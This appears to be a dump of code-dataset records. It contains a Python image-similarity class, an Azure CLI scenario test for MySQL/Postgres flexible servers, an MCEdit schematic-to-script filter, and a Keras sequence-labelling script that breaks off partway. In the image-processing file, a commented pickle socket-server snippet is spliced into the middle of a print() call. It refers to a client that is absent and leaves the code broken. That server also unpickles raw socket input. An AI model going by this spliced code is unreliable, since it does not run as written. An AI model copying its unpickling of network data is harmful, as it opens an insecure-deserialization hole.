PrimeNumberGenerator\r\n\r\nimport time, random, math\r\ntry:\r\n\timport cv2\r\n\timport numpy as np\r\n\r\nexcept ImportError:\r\n\timport import_alternate\r\n\r\n_AGENT_VARS = readJsonFile('agent')\r\n##constants\r\n_AGENT_STATES = _AGENT_VARS[\"states\"]\r\n_AGENT_SENSORS = _AGENT_VARS[\"sensors\"]\r\n\r\nclass ImageProcessor:\r\n\r\n\t# to prevent from tranforming all the time\r\n\tpattern_map = {}\r\n\t\r\n\tmemory = {}\r\n\r\n # frequency of data\r\n\tfreq = {}\r\n\r\n\tdef __init__(self):\r\n\t\tself.PrimeNumberGenerator = PrimeNumberGenerator()\r\n\r\n\tdef findRelatedImages(self, img_id, include=False):\r\n\t\trel = {}\r\n\t\timage_model = self.memory[img_id]\r\n\t\tfor image_id in self.memory:\r\n\t\t\tif include == False and img_id == image_id:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\trelation = self.getRelation(image_model, self.memory[image_id])\r\n\r\n\t\t\tif image_id not in rel:\r\n\t\t\t\trel[image_id] = 0\r\n\r\n\t\t\trel[image_id] = relation\r\n\r\n\t\tmean_rel = self.mean(rel)\r\n\t\trel = {x:rel[x] for x in rel if rel[x] >= mean_rel}\r\n\t\t\r\n\t\tfor x in rel:\r\n\t\t\tprint(\"related images\", x, 
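# The socket client above (client.py) pickles a dict with keys a, b and h,
# sends it to localhost:9090, and prints the decoded reply as the trapezoid
# area. A minimal counterpart server, assuming the protocol implied by the
# client (area = (a + b) / 2 * h):

import pickle
import socket

srv = socket.socket()
srv.bind(('localhost', 9090))
srv.listen(1)
conn, _ = srv.accept()
obj = pickle.loads(conn.recv(4096))
area = (obj['a'] + obj['b']) * obj['h'] / 2   # trapezoid area
conn.sendall(str(area).encode())
conn.close()
srv.close()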
rel[x])\r\n\r\n\t\treturn rel\r\n\r\n\tdef getPixelPositionRelation(self, pixel_positions1, pixel_positions2):\r\n\t\tratios = []\r\n\t\tfor i, pp in enumerate(pixel_positions2):\r\n\t\t\tif i >= len(pixel_positions1):\r\n\t\t\t\tratio = 0\r\n\r\n\t\t\telse:\r\n\t\t\t\tppx = pixel_positions1[i]\r\n\t\t\t\tif pp == ppx:\r\n\t\t\t\t\tratio = 1\r\n\r\n\t\t\t\telif pp > ppx:\r\n\t\t\t\t\tratio = float(ppx) / float(pp)\r\n\r\n\t\t\t\telse:\r\n\t\t\t\t\tratio = float(pp) / float(ppx)\r\n\t\t\tratios.append(ratio)\r\n\r\n\t\tratio = self.mean(ratios)\r\n\r\n\t\treturn ratio\r\n\r\n\tdef getPixelRelation(self, pixel1, pixel2):\r\n\t\tii = 0 #initail\r\n\t\tr_d = []\r\n\t\tfor ij in range(1, 4, 1):\r\n\t\t\tend = ij*3\r\n\t\t\tval = pixel1[ii:end]\r\n\t\t\tx = pixel2[ii:end]\r\n\r\n\t\t\tvalue = int(val)\r\n\t\t\tx = int(x)\r\n\r\n\t\t\tif value == x:\r\n\t\t\t\tr_dx = 1\r\n\r\n\t\t\telif value > x:\r\n\t\t\t\tr_dx = x/value\r\n\r\n\t\t\telse:\r\n\t\t\t\tr_dx = value/x\r\n\t\t\t\r\n\t\t\tr_d.append(r_dx)\r\n\t\t\tii = end\r\n\r\n\t\t# print(r_d)\r\n\t\tr_d = sum(r_d)/len(r_d)\r\n\t\treturn round(r_d, 4)\r\n\r\n\tdef getRelation(self, image_model1, image_model2):\r\n\t\tratios = []\r\n\t\trelated = []\r\n\t\tfor pixel1 in image_model1:\r\n\t\t\trelations = []\r\n\t\t\tpairs = []\r\n\r\n\t\t\tpixel1_construct = image_model1[pixel1]\r\n\t\t\tfor pixel2 in image_model2:\r\n\t\t\t\tpixel2_construct = image_model2[pixel2]\r\n\r\n\t\t\t\tpixel_relation = self.getPixelRelation(pixel1, pixel2)\r\n\t\t\t\tpixel_position_relation = self.getPixelPositionRelation(pixel1_construct, pixel2_construct)\r\n\t\t\t\t\r\n\t\t\t\tratio = self.mean([pixel_relation, pixel_position_relation])\r\n\t\t\t\tpair = (pixel1, pixel2, pixel1_construct, pixel2_construct)\r\n\r\n\t\t\t\trelations.append(ratio)\r\n\t\t\t\tpairs.append(pair)\r\n\r\n\t\t\tratio = max(relations)\r\n\t\t\tmean_ratio = self.mean(relations)\r\n\t\t\t\r\n\t\t\trelated.append([pairs[i] for i, relation in enumerate(relations) if relation >= mean_ratio])\r\n\t\t\tratios.append(ratio)\r\n \r\n\t\treturn self.mean(ratios), related\r\n\r\n\tdef getDataModels(self, data):\r\n\t\t'''\r\n\t\ttells how the data is modeled or constructed\r\n\t\t'''\r\n\t\tdata_li = data.split(\" \")\r\n\t\telements = set(data_li)\r\n\t\tlength = len(data_li)\r\n\r\n\t\tpatterns = {}\r\n\t\tindexes = {}\r\n\t\tfirst = {}\r\n\t\tfor i, dx in enumerate(data_li):\r\n\t\t\tif dx not in indexes:\r\n\t\t\t\tindexes[dx] = []\r\n\t\t\t\tfirst[dx] = i\r\n\r\n\t\t\tval = i - first[dx]\r\n\t\t\tindexes[dx].append(val)\r\n\r\n\t\tfor element in elements:\r\n\t\t\tconstruct = tuple([format(index/length, '.4f') for index in indexes[element]])\r\n\t\t\tpatterns[element] = construct\r\n\r\n\t\treturn patterns\r\n\r\n\tdef mean(self, li):\r\n\t\tif len(li) == 0:\r\n\t\t\treturn 0\r\n\r\n\t\telse:\r\n\t\t\tif type(li) == dict:\r\n\t\t\t\tli = [x for x in li.values()]\r\n\r\n\t\t\treturn sum(li)/len(li)\r\n\t\t\t\r\n\tdef newImage(self, image):\r\n\t\treturn self.transform(image)\r\n\t\r\n\tdef process(self, images, memory_id, sense):\r\n\t\trelated_images = self.findRelatedImages(memory_id)\r\n\r\n\t\treturn related_images\r\n\r\n\tdef pixelToString(self, pixel):\r\n\t\treturn \"\".join(['%03d'%(x) for x in pixel])\r\n\r\n\tdef save2memory(self, image):\r\n\t\t'''\r\n\t\tsave the construct fromat of the image in memory\r\n\t\timage - current/ latest image\r\n\t\t'''\r\n\t\timage_model = self.getDataModels(image)\r\n\r\n\t\tpattern_ratios = {element: 
(int(element[0:3])+int(element[3:6])+int(element[6:9]))/(3*255) for element in image_model}\r\n\r\n\t\tmean_pattern_ratio = sum(pattern_ratios.values())/len(image_model)\r\n\r\n\t\timage_model = {element: image_model[element] for element in image_model if len(image_model[element]) > 1 and pattern_ratios[element] >= mean_pattern_ratio}\r\n\r\n\t\tkey = self.PrimeNumberGenerator.nextPrimeNumber()\r\n\t\tself.memory[key] = image_model\r\n\r\n\t\t# for a in image_model:\r\n\t\t# \tprint(a, image_model[a])\r\n\t\t\t\r\n\t\tself.freq[key] = 1\r\n\t\treturn key\r\n\r\n\tdef transform(self, image):\r\n\t\t'''\r\n\t\tconverts an image into string of unique ids\r\n\t\t'''\r\n\t\tif type(image) == type(None):\r\n\t\t\treturn 'ImageNull'\r\n\r\n\t\timg = image.copy()\r\n\t\timage_ = []\r\n\t\tlast_pixel = [000, 000, 000]\r\n\t\tfor i in range(len(image)):\r\n\t\t\tfor j in range(len(image[i])):\r\n\t\t\t\tpixel = image[i, j]\r\n\r\n\t\t\t\tdiff = np.array([abs(int(pixel[k]) - int(last_pixel[k])) for k in range(3)])\r\n\t\t\t\timg[i,j] = diff\r\n\t\t\t\tpattern = tuple(diff)\r\n\t\t\t\t# print(last_pixel, pixel, pattern, diff)\r\n\t\t\t\tif pattern not in self.pattern_map:\r\n\t\t\t\t\tself.pattern_map[pattern] = self.pixelToString(pattern)\r\n\r\n\t\t\t\tpattern_str = self.pattern_map[pattern]\r\n\t\t\t\t\r\n\t\t\t\timage_.append(pattern_str)\r\n\t\t\t\tlast_pixel = pixel.copy()\r\n\t\timage_ = ' '.join(image_)\r\n\t\t# cv2.imwrite('d.jpg', img)\r\n\t\t# input()\r\n\t\treturn image_\r\n","sub_path":"image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"374337033","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
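# transform() above stores, for each pixel, the channel-wise absolute
# difference from the previous pixel, and pixelToString packs a pixel into a
# fixed-width 9-digit string so getPixelRelation can slice it back apart in
# 3-digit groups. The packing step in isolation:

pixel = (12, 255, 3)
encoded = "".join('%03d' % v for v in pixel)
print(encoded)                                                  # '012255003'
print(int(encoded[0:3]), int(encoded[3:6]), int(encoded[6:9]))  # 12 255 3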
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\nimport time\n\nfrom datetime import datetime, timedelta, tzinfo\nfrom time import sleep\nfrom dateutil.tz import tzutc\nfrom azure_devtools.scenario_tests import AllowLargeResponse\nfrom msrestazure.azure_exceptions import CloudError\nfrom azure.cli.core.local_context import AzCLILocalContext, ALL, LOCAL_CONTEXT_FILE\nfrom azure.cli.core.util import CLIError\nfrom azure.cli.core.util import parse_proxy_resource_id\nfrom azure.cli.testsdk.base import execute\nfrom azure.cli.testsdk.exceptions import CliTestError\nfrom azure.cli.testsdk import (\n JMESPathCheck,\n NoneCheck,\n ResourceGroupPreparer,\n ScenarioTest,\n LocalContextScenarioTest,\n live_only)\nfrom azure.cli.testsdk.preparers import (\n AbstractPreparer,\n SingleValueReplacer)\n\n# Constants\nSERVER_NAME_PREFIX = 'azuredbclitest-'\nSERVER_NAME_MAX_LENGTH = 20\nGROUP_NAME_PREFIX = 'azuredbclitest-'\nGROUP_NAME_MAX_LENGTH = 20\n\n\nclass FlexibleServerMgmtScenarioTest(ScenarioTest):\n\n postgres_location = 'eastus'\n mysql_location = 'westus2'\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=postgres_location)\n def test_postgres_flexible_server_mgmt(self, resource_group):\n self._test_flexible_server_mgmt('postgres', resource_group)\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=mysql_location)\n def test_mysql_flexible_server_mgmt(self, resource_group):\n self._test_flexible_server_mgmt('mysql', resource_group)\n\n def _test_flexible_server_mgmt(self, database_engine, resource_group):\n\n # flexible-server create\n if self.cli_ctx.local_context.is_on:\n self.cmd('local-context off')\n\n if database_engine == 'postgres':\n tier = 'GeneralPurpose'\n sku_name = 'Standard_D2s_v3'\n version = '12'\n storage_size = 128\n location = self.postgres_location\n elif database_engine == 'mysql':\n tier = 'Burstable'\n sku_name = 'Standard_B1ms'\n storage_size = 10\n version = '5.7'\n location = self.mysql_location\n\n # flexible-server create with user input\n server_name = self.create_random_name(SERVER_NAME_PREFIX, SERVER_NAME_MAX_LENGTH)\n storage_size_mb = storage_size * 1024\n backup_retention = 7\n\n list_checks = [JMESPathCheck('name', server_name),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('sku.name', sku_name),\n JMESPathCheck('sku.tier', tier),\n JMESPathCheck('version', version),\n JMESPathCheck('storageProfile.storageMb', storage_size_mb),\n JMESPathCheck('storageProfile.backupRetentionDays', backup_retention)]\n\n self.cmd('{} flexible-server create -g {} -n {} -l {}'\n .format(database_engine, resource_group, server_name, location))\n current_time = datetime.utcnow()\n\n # flexible-server show\n self.cmd('{} flexible-server show -g {} -n {}'\n .format(database_engine, resource_group, server_name), checks=list_checks).get_output_in_json()\n\n # flexible-server update\n self.cmd('{} flexible-server update -g {} -n {} --storage-size 256'\n .format(database_engine, resource_group, server_name),\n checks=[JMESPathCheck('storageProfile.storageMb', 256 * 1024)])\n\n self.cmd('{} flexible-server update -g {} -n {} --backup-retention {}'\n .format(database_engine, resource_group, server_name, backup_retention + 10),\n checks=[JMESPathCheck('storageProfile.backupRetentionDays', backup_retention + 10)])\n\n if database_engine == 'postgres':\n tier = 'Burstable'\n sku_name = 'Standard_B1ms'\n elif database_engine == 'mysql':\n tier = 
'GeneralPurpose'\n sku_name = 'Standard_D2ds_v4'\n self.cmd('{} flexible-server update -g {} -n {} --tier {} --sku-name {}'\n .format(database_engine, resource_group, server_name, tier, sku_name),\n checks=[JMESPathCheck('sku.tier', tier),\n JMESPathCheck('sku.name', sku_name)])\n\n if database_engine == 'postgres':\n self.cmd('{} flexible-server update -g {} -n {} --maintenance-window Mon:1:30'\n .format(database_engine, resource_group, server_name),\n checks=[JMESPathCheck('maintenanceWindow.dayOfWeek', 1),\n JMESPathCheck('maintenanceWindow.startHour', 1),\n JMESPathCheck('maintenanceWindow.startMinute', 30)])\n\n self.cmd('{} flexible-server update -g {} -n {} --tags key=3'\n .format(database_engine, resource_group, server_name),\n checks=[JMESPathCheck('tags.key', '3')])\n\n # flexible-server restore\n restore_server_name = 'restore-' + server_name\n restore_time = (current_time + timedelta(minutes=10)).replace(tzinfo=tzutc()).isoformat()\n self.cmd('{} flexible-server restore -g {} --name {} --source-server {} --time {}'\n .format(database_engine, resource_group, restore_server_name, server_name, restore_time),\n checks=[JMESPathCheck('name', restore_server_name),\n JMESPathCheck('resourceGroup', resource_group)])\n\n if database_engine == 'postgres':\n # flexible-server restart\n self.cmd('{} flexible-server restart -g {} -n {}'\n .format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n # flexible-server stop\n self.cmd('{} flexible-server stop -g {} -n {}'\n .format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n # flexible-server start\n self.cmd('{} flexible-server start -g {} -n {}'\n .format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n # flexible-server list servers\n self.cmd('{} flexible-server list -g {}'.format(database_engine, resource_group),\n checks=[JMESPathCheck('type(@)', 'array')])\n\n # test delete server\n self.cmd('{} flexible-server delete -g {} -n {} --force'.format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n\nclass FlexibleServerProxyResourceMgmtScenarioTest(ScenarioTest):\n\n postgres_location = 'eastus'\n mysql_location = 'westus2'\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=postgres_location)\n def test_postgres_flexible_server_proxy_resource(self, resource_group):\n self._test_firewall_rule_mgmt('postgres', resource_group)\n self._test_parameter_mgmt('postgres', resource_group)\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=mysql_location)\n def test_mysql_flexible_server_proxy_resource(self, resource_group):\n self._test_firewall_rule_mgmt('mysql', resource_group)\n self._test_parameter_mgmt('mysql', resource_group)\n\n def _test_firewall_rule_mgmt(self, database_engine, resource_group):\n\n server_name = self.create_random_name(SERVER_NAME_PREFIX, SERVER_NAME_MAX_LENGTH)\n storage_size = 32\n if database_engine == 'postgres':\n version = '12'\n location = self.postgres_location\n elif database_engine == 'mysql':\n version = '5.7'\n location = self.mysql_location\n self.cmd('{} flexible-server create -g {} --name {} -l {} --storage-size {} --version {}'.\n format(database_engine, resource_group, server_name, location, storage_size, version))\n\n firewall_rule_name = 'firewall_test_rule'\n start_ip_address = '10.10.10.10'\n end_ip_address = '12.12.12.12'\n firewall_rule_checks = [JMESPathCheck('name', firewall_rule_name),\n JMESPathCheck('endIpAddress', end_ip_address),\n JMESPathCheck('startIpAddress', start_ip_address)]\n\n # 
firewall-rule create\n self.cmd('{} flexible-server firewall-rule create -g {} -s {} --name {} '\n '--start-ip-address {} --end-ip-address {} '\n .format(database_engine, resource_group, server_name, firewall_rule_name, start_ip_address, end_ip_address),\n checks=firewall_rule_checks)\n\n # firewall-rule show\n self.cmd('{} flexible-server firewall-rule show -g {} -s {} --name {} '\n .format(database_engine, resource_group, server_name, firewall_rule_name),\n checks=firewall_rule_checks)\n\n # firewall-rule update\n new_start_ip_address = '9.9.9.9'\n self.cmd('{} flexible-server firewall-rule update -g {} -s {} --name {} --start-ip-address {}'\n .format(database_engine, resource_group, server_name, firewall_rule_name, new_start_ip_address),\n checks=[JMESPathCheck('startIpAddress', new_start_ip_address)])\n\n new_end_ip_address = '13.13.13.13'\n self.cmd('{} flexible-server firewall-rule update -g {} -s {} --name {} --end-ip-address {}'\n .format(database_engine, resource_group, server_name, firewall_rule_name, new_end_ip_address))\n\n # Add second firewall-rule\n new_firewall_rule_name = 'firewall_test_rule2'\n firewall_rule_checks = [JMESPathCheck('name', new_firewall_rule_name),\n JMESPathCheck('endIpAddress', end_ip_address),\n JMESPathCheck('startIpAddress', start_ip_address)]\n self.cmd('{} flexible-server firewall-rule create -g {} -s {} --name {} '\n '--start-ip-address {} --end-ip-address {} '\n .format(database_engine, resource_group, server_name, new_firewall_rule_name, start_ip_address, end_ip_address),\n checks=firewall_rule_checks)\n\n # firewall-rule list\n self.cmd('{} flexible-server firewall-rule list -g {} -s {}'\n .format(database_engine, resource_group, server_name), checks=[JMESPathCheck('length(@)', 2)])\n\n # firewall-rule delete\n self.cmd('{} flexible-server firewall-rule delete --name {} -g {} --server {} --prompt no'\n .format(database_engine, firewall_rule_name, resource_group, server_name), checks=NoneCheck())\n\n self.cmd('{} flexible-server firewall-rule list -g {} --server {}'\n .format(database_engine, resource_group, server_name), checks=[JMESPathCheck('length(@)', 1)])\n\n self.cmd('{} flexible-server firewall-rule delete -g {} -s {} --name {} --prompt no'\n .format(database_engine, resource_group, server_name, new_firewall_rule_name))\n\n self.cmd('{} flexible-server firewall-rule list -g {} -s {}'\n .format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n def _test_parameter_mgmt(self, database_engine, resource_group):\n\n server_name = self.create_random_name(SERVER_NAME_PREFIX, SERVER_NAME_MAX_LENGTH)\n storage_size = 32\n if database_engine == 'postgres':\n version = '12'\n location = self.postgres_location\n elif database_engine == 'mysql':\n version = '5.7'\n location = self.mysql_location\n self.cmd('{} flexible-server create -g {} --name {} -l {} --storage-size {} --version {}'.\n format(database_engine, resource_group, server_name, location, storage_size, version))\n\n # parameter list\n self.cmd('{} flexible-server parameter list -g {} -s {}'.format(database_engine, resource_group, server_name), checks=[JMESPathCheck('type(@)', 'array')])\n\n if database_engine == 'mysql':\n parameter_name = 'wait_timeout'\n default_value = '28800'\n value = '30000'\n elif database_engine == 'postgres':\n parameter_name = 'lock_timeout'\n default_value = '0'\n value = '2000'\n\n # show\n source = 'system-default'\n self.cmd('{} flexible-server parameter show --name {} -g {} -s {}'.format(database_engine, parameter_name, resource_group, 
server_name),\n checks=[JMESPathCheck('defaultValue', default_value),\n JMESPathCheck('source', source)])\n\n # parameter set\n source = 'user-override'\n self.cmd('{} flexible-server parameter set --name {} -v {} --source {} -s {} -g {}'.format(database_engine, parameter_name, value, source, server_name, resource_group),\n checks=[JMESPathCheck('value', value),\n JMESPathCheck('source', source)])\n\n\nclass FlexibleServerValidatorScenarioTest(ScenarioTest):\n\n postgres_location = 'eastus'\n mysql_location = 'westus2'\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=postgres_location)\n def test_postgres_flexible_server_mgmt_validator(self, resource_group):\n self._test_mgmt_validator('postgres', resource_group)\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=mysql_location)\n def test_mysql_flexible_server_mgmt_validator(self, resource_group):\n self._test_mgmt_validator('mysql', resource_group)\n\n def _test_mgmt_validator(self, database_engine, resource_group):\n\n RANDOM_VARIABLE_MAX_LENGTH = 30\n if database_engine == 'postgres':\n location = self.postgres_location\n elif database_engine == 'mysql':\n location = self.mysql_location\n invalid_version = self.create_random_name('version', RANDOM_VARIABLE_MAX_LENGTH)\n invalid_sku_name = self.create_random_name('sku_name', RANDOM_VARIABLE_MAX_LENGTH)\n invalid_tier = self.create_random_name('tier', RANDOM_VARIABLE_MAX_LENGTH)\n valid_tier = 'GeneralPurpose'\n invalid_backup_retention = 1\n\n # Create\n self.cmd('{} flexible-server create -g {} -l {} --tier {}'.format(database_engine, resource_group, location, invalid_tier), expect_failure=True)\n\n self.cmd('{} flexible-server create -g {} -l {} --version {}'.format(database_engine, resource_group, location, invalid_version), expect_failure=True)\n\n self.cmd('{} flexible-server create -g {} -l {} --tier {} --sku-name {}'.format(database_engine, resource_group, location, valid_tier, invalid_sku_name), expect_failure=True)\n\n self.cmd('{} flexible-server create -g {} -l {} --backup-retention {}'.format(database_engine, resource_group, location, invalid_backup_retention), expect_failure=True)\n\n if database_engine == 'postgres':\n invalid_storage_size = 60\n elif database_engine == 'mysql':\n invalid_storage_size = 999999\n self.cmd('{} flexible-server create -g {} -l {} --storage-size {}'.format(database_engine, resource_group, location, invalid_storage_size), expect_failure=True)\n\n server_name = self.create_random_name(SERVER_NAME_PREFIX, RANDOM_VARIABLE_MAX_LENGTH)\n if database_engine == 'postgres':\n tier = 'MemoryOptimized'\n version = 12\n sku_name = 'Standard_E2s_v3'\n storage_size = 64\n elif database_engine == 'mysql':\n tier = 'GeneralPurpose'\n version = 5.7\n sku_name = 'Standard_D2ds_v4'\n storage_size = 20\n storage_size_mb = storage_size * 1024\n backup_retention = 10\n\n list_checks = [JMESPathCheck('name', server_name),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('sku.name', sku_name),\n JMESPathCheck('sku.tier', tier),\n JMESPathCheck('version', version),\n JMESPathCheck('storageProfile.storageMb', storage_size_mb),\n JMESPathCheck('storageProfile.backupRetentionDays', backup_retention)]\n\n self.cmd('{} flexible-server create -g {} -n {} -l {} --tier {} --version {} --sku-name {} --storage-size {} --backup-retention {}'\n .format(database_engine, resource_group, server_name, location, tier, version, sku_name, storage_size, backup_retention))\n self.cmd('{} flexible-server show -g {} -n {}'.format(database_engine, 
resource_group, server_name), checks=list_checks)\n\n # Update\n invalid_storage_size_small = storage_size - 1\n self.cmd('{} flexible-server update -g {} -n {} --tier {}'.format(database_engine, resource_group, server_name, invalid_tier), expect_failure=True)\n\n self.cmd('{} flexible-server update -g {} -n {} --tier {} --sku-name {}'.format(database_engine, resource_group, server_name, valid_tier, invalid_sku_name), expect_failure=True)\n\n self.cmd('{} flexible-server update -g {} -n {} --storage-size {}'.format(database_engine, resource_group, server_name, invalid_storage_size_small), expect_failure=True)\n\n self.cmd('{} flexible-server update -g {} -n {} --backup-retention {}'.format(database_engine, resource_group, server_name, invalid_backup_retention), expect_failure=True)\n\n self.cmd('{} flexible-server delete -g {} -n {} --force'.format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n\nclass FlexibleServerReplicationMgmtScenarioTest(ScenarioTest): # pylint: disable=too-few-public-methods\n\n mysql_location = 'westus2'\n\n # @ResourceGroupPreparer(location=mysql_location)\n # def test_mysql_flexible_server_replica_mgmt(self, resource_group):\n # self._test_flexible_server_replica_mgmt('mysql', resource_group)\n\n def _test_flexible_server_replica_mgmt(self, database_engine, resource_group):\n location = self.mysql_location\n master_server = self.create_random_name(SERVER_NAME_PREFIX, 32)\n replicas = [self.create_random_name('azuredbclirep1', SERVER_NAME_MAX_LENGTH),\n self.create_random_name('azuredbclirep2', SERVER_NAME_MAX_LENGTH)]\n\n # create a server\n self.cmd('{} flexible-server create -g {} --name {} -l {} --storage-size {}'\n .format(database_engine, resource_group, master_server, location, 256))\n result = self.cmd('{} flexible-server show -g {} --name {} '\n .format(database_engine, resource_group, master_server),\n checks=[JMESPathCheck('replicationRole', 'None')]).get_output_in_json()\n\n # test replica create\n self.cmd('{} flexible-server replica create -g {} --name {} --source-server {}'\n .format(database_engine, resource_group, replicas[0], result['id']),\n checks=[\n JMESPathCheck('name', replicas[0]),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('sku.tier', result['sku']['tier']),\n JMESPathCheck('sku.name', result['sku']['name']),\n JMESPathCheck('replicationRole', 'Replica'),\n JMESPathCheck('sourceServerId', result['id']),\n JMESPathCheck('replicaCapacity', '0')])\n\n # test show server with replication info\n self.cmd('{} flexible-server show -g {} -n {}'\n .format(database_engine, resource_group, master_server),\n checks=[\n JMESPathCheck('replicationRole', 'Source'),\n JMESPathCheck('sourceServerId', ''),\n JMESPathCheck('replicaCapacity', result['replicaCapacity'])])\n\n # test replica list\n self.cmd('{} flexible-server replica list -g {} --name {}'\n .format(database_engine, resource_group, master_server),\n checks=[JMESPathCheck('length(@)', 1)])\n\n # test replica stop\n self.cmd('{} flexible-server replica stop-replication -g {} --name {} --yes'\n .format(database_engine, resource_group, replicas[0]),\n checks=[\n JMESPathCheck('name', replicas[0]),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('replicationRole', 'None'),\n JMESPathCheck('sourceServerId', ''),\n JMESPathCheck('replicaCapacity', result['replicaCapacity'])])\n\n # test show server with replication info, master becomes normal server\n self.cmd('{} flexible-server show -g {} --name {}'\n .format(database_engine, 
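# All of these tests lean on the same azure.cli.testsdk idiom: self.cmd() runs
# a CLI command (without the leading "az") and asserts on the JSON output with
# JMESPath expressions. A stripped-down sketch of that pattern, with an
# illustrative command and checks:

from azure.cli.testsdk import JMESPathCheck, ResourceGroupPreparer, ScenarioTest

class ExampleScenarioTest(ScenarioTest):

    @ResourceGroupPreparer()
    def test_group_show(self, resource_group):
        self.cmd('group show -n {}'.format(resource_group),
                 checks=[JMESPathCheck('name', resource_group),
                         JMESPathCheck('properties.provisioningState', 'Succeeded')])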
resource_group, master_server),\n checks=[\n JMESPathCheck('replicationRole', 'None'),\n JMESPathCheck('sourceServerId', ''),\n JMESPathCheck('replicaCapacity', result['replicaCapacity'])])\n\n # test delete master server\n self.cmd('{} flexible-server replica create -g {} --name {} --source-server {}'\n .format(database_engine, resource_group, replicas[1], result['id']),\n checks=[\n JMESPathCheck('name', replicas[1]),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('sku.name', result['sku']['name']),\n JMESPathCheck('replicationRole', 'Replica'),\n JMESPathCheck('sourceServerId', result['id']),\n JMESPathCheck('replicaCapacity', '0')])\n\n self.cmd('{} flexible-server delete -g {} --name {} --force'\n .format(database_engine, resource_group, master_server), checks=NoneCheck())\n\n # test show server with replication info, replica was auto stopped after master server deleted\n self.cmd('{} flexible-server show -g {} --name {}'\n .format(database_engine, resource_group, replicas[1]),\n checks=[\n JMESPathCheck('replicationRole', 'None'),\n JMESPathCheck('sourceServerId', ''),\n JMESPathCheck('replicaCapacity', result['replicaCapacity'])])\n\n # clean up servers\n self.cmd('{} flexible-server delete -g {} --name {} --force'\n .format(database_engine, resource_group, replicas[0]), checks=NoneCheck())\n self.cmd('{} flexible-server delete -g {} --name {} --force'\n .format(database_engine, resource_group, replicas[1]), checks=NoneCheck())\n","sub_path":"src/azure-cli/azure/cli/command_modules/rdbms/tests/latest/test_rdbms_flexible_commands.py","file_name":"test_rdbms_flexible_commands.py","file_ext":"py","file_size_in_byte":22666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"223166884","text":"# This is filter SchematicToScript. It can turn any selection into a python script. The scripts are saved in MCEdit/schematic2script/\n# This filter was created by Tomsik68\n# If you redistribute/modify, please give credit to Tomsik68 :)\n# ================================================================\n# Have an idea? Can you improve this code? 
Fork the Github!\n# Link: https://github.com/Podshot/MCEdit-Filters\n\nimport os\nfrom pymclevel.schematic import extractSchematicFrom\n\ndef serialize3DArray(array):\n result = \"\"\n result += \"[\"\n for d1 in array:\n result += \"[\"\n for d2 in d1:\n result += \"[\"\n for elem in d2:\n result += str(elem) + \",\"\n result += \"],\"\n result += \"],\"\n result += \"]\"\n result = result.replace(\",]\", \"]\")\n return result\ndisplayName = \"Schematic2Script\"\ninputs = (\n (\"Ignore Block Data\", False),\n (\"Filename\", (\"string\",\"value=outSchematic\"))\n )\ndef perform(level,box,options):\n try:\n os.mkdir(\"schematic2script\")\n except OSError:\n pass\n # Get schematic from the level\n schema = extractSchematicFrom(level,box,False)\n ignoreData = options[\"Ignore Block Data\"]\n # Create lines array for writing into file\n lines = [\"\"]\n lines.append(\"from pymclevel import MCSchematic\\n\")\n lines.append(\"# TODO: rename your function\\n\")\n lines.append(\"def createSchematic():\\n\")\n lines.append(\" e = MCSchematic(shape=(\"+str(schema.Width)+\",\"+str(schema.Height)+\",\"+str(schema.Length)+\"),filename='')\\n\")\n # copy blocks array\n lines.append(\" e._Blocks = \" + serialize3DArray(schema._Blocks) + \"\\n\")\n if not ignoreData:\n # copy data array if it's not ignored\n lines.append(\" e.root_tag['Data'] = pymclevel.nbt.TAG_Byte_Array(\" + serialize3DArray(schema.root_tag['Data'].value) + \")\\n\")\n lines.append(\" return e\")\n # save the file\n with open(\"schematic2script/\"+options[\"Filename\"]+\".py\", \"w\") as f:\n f.writelines(lines)\n raise Exception(\"Saved as schematic2script/\"+options[\"Filename\"]+\".py\")","sub_path":"Work in Progress/SchematicToScript.py","file_name":"SchematicToScript.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"629726382","text":"# -*- coding: utf-8 -*-\n# @System: Ubuntu16\n# @Author: Alan Lau\n# @Date: 2017-09-13 14:43:03\n\nimport json\nimport keras\nfrom datetime import datetime as dt\nimport numpy as np\nfrom keras.utils import np_utils\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Embedding, LSTM, Dropout, Bidirectional, Input, Masking, TimeDistributed\nfrom keras_contrib.layers import CRF\n\n\ndef load(datapath):\n f = open(datapath, 'r')\n data = json.load(f)\n return data['dataset'], data['labels'], dict(data['word_index'])\n\n\nclass revivification:\n def __init__(self, dataset, word_index):\n self.dataset = dataset\n self.word_index = word_index\n self.corpus = []\n\n def reStore(self):\n for datum in self.dataset:\n sentence = ''.join(list(map(lambda wordindex: next((k for k, v in self.word_index.items(\n ) if v == wordindex), None), list(filter(lambda wordindex: wordindex != 0, datum)))))\n self.corpus.append(sentence)\n return self.corpus\n\n\nclass nn:\n def __init__(self, dataset, labels, wordvocab):\n self.dataset = np.array(dataset)\n self.labels = np.array(labels)\n self.wordvocab = wordvocab\n\n def trainingModel(self):\n vocabSize = len(self.wordvocab)\n embeddingDim = 100 # the vector size a word need to be converted\n maxlen = 100 # the size of a sentence vector\n outputDims = 4 + 1\n # 